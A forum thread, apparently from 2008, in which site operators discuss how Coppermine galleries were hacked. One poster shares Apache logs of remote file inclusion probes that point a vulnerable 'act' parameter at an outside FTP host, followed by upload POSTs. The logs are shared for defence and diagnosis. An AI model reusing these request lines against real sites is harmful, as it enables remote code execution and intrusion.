Is it definite that these other sites aren't running coppermine somewhere though (so whilst wordpress or PHPBB might start throwing up the hacked code pages is it just because they've gotten in through coppermine and rewrote to all pages).
Also if other software were vulnerable how is the affected user base still so small. It's hard enough to rationalise how, if there's an exploit in the wild which effects all versions of coppermine's gallery, there's still only a handful of people stating they've been hacked. It the exploit affects various other PHP scripts then it's even harder to understand.
You are right on both counts. I suppose one reason there might not be many reports could be that the vast majority of coppermine galleries are personal things whose owners only look in from time to time and haven't yet noticed.
That said, I still think there may be more to this and more problems to come, for the reasons you mention in your second paragraph. It's almost like a trial run.
What further aroused my suspicions was our second attack. We couldn't get the server logs after the first one, because Apache had - by coincidence - started to run a backup, by the time we realised what had happened, but we got them right after the second one and it looked liked the gallery attack was preceeded by a different attack, about 3 hours earlier:
208.16.236.69 - - [10/Apr/2008:13:42:23 +0200] "GET /news/newsDetails.php?id=5686/home.php?act=ftp://84.32.137.157/incoming/upload/trem/oldbisok??
HTTP/1.1" 200 9290 "-" "libwww-perl/5.805"
208.16.236.69 - - [10/Apr/2008:13:42:24 +0200] "GET /home.php?act=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1"
404 - "-" "libwww-perl/5.805"
208.16.236.69 - - [10/Apr/2008:13:42:24 +0200] "GET /news/home.php?act=ftp://84.32.137.157/incoming/upload/trem/oldbisok??
HTTP/1.1" 404 - "-" "libwww-perl/5.805"
217.67.26.84 - - [10/Apr/2008:14:49:37 +0200] "GET /news/newsDetails.php?id=5686/home.php?act=ftp://84.32.137.157/incoming/upload/trem/oldbisok??
HTTP/1.1" 200 9584 "-" "libwww-perl/5.805"
217.67.26.84 - - [10/Apr/2008:14:49:38 +0200] "GET /home.php?act=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1"
404 - "-" "libwww-perl/5.805"
217.67.26.84 - - [10/Apr/2008:14:49:38 +0200] "GET /news/home.php?act=ftp://84.32.137.157/incoming/upload/trem/oldbisok??
HTTP/1.1" 404 - "-" "libwww-perl/5.805"
85.114.135.126 - - [10/Apr/2008:14:50:51 +0200] "GET /news/newsDetails.php?id=5686/home.php?act=ftp://84.32.137.157/incoming/upload/trem/oldbisok??
HTTP/1.1" 200 9584 "-" "libwww-perl/5.805"
85.114.135.126 - - [10/Apr/2008:14:50:51 +0200] "GET /home.php?act=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1"
404 - "-" "libwww-perl/5.805"
85.114.135.126 - - [10/Apr/2008:14:50:52 +0200] "GET /news/home.php?act=ftp://84.32.137.157/incoming/upload/trem/oldbisok??
HTTP/1.1" 404 - "-" "libwww-perl/5.805"
209.85.105.25 - - [10/Apr/2008:15:26:44 +0200] "GET /news/newsDetails.php?id=5686/home.php?act=ftp://84.32.137.157/incoming/upload/trem/oldbisok??
HTTP/1.1" 200 9584 "-" "libwww-perl/5.79"
209.85.105.25 - - [10/Apr/2008:15:26:45 +0200] "GET /home.php?act=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1"
404 - "-" "libwww-perl/5.79"
209.85.105.25 - - [10/Apr/2008:15:26:46 +0200] "GET /news/home.php?act=ftp://84.32.137.157/incoming/upload/trem/oldbisok??
HTTP/1.1" 404 - "-" "libwww-perl/5.79"
195.5.117.252 - - [10/Apr/2008:18:46:01 +0200] "POST /photos/upload.php HTTP/1.1" 200 6920 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
195.5.117.252 - - [10/Apr/2008:18:47:13 +0200] "POST /photos/upload.php HTTP/1.1" 200 43854 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
195.5.117.252 - - [10/Apr/2008:18:47:22 +0200] "POST /photos/upload.php HTTP/1.1" 200 6782 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
A search on oldbisok produced this:
http://rapidlibrary.com/index.php?q=synful+orchestra+index+php+sub+ftp+84+32+137+157+incoming+upload+trem+oldbisok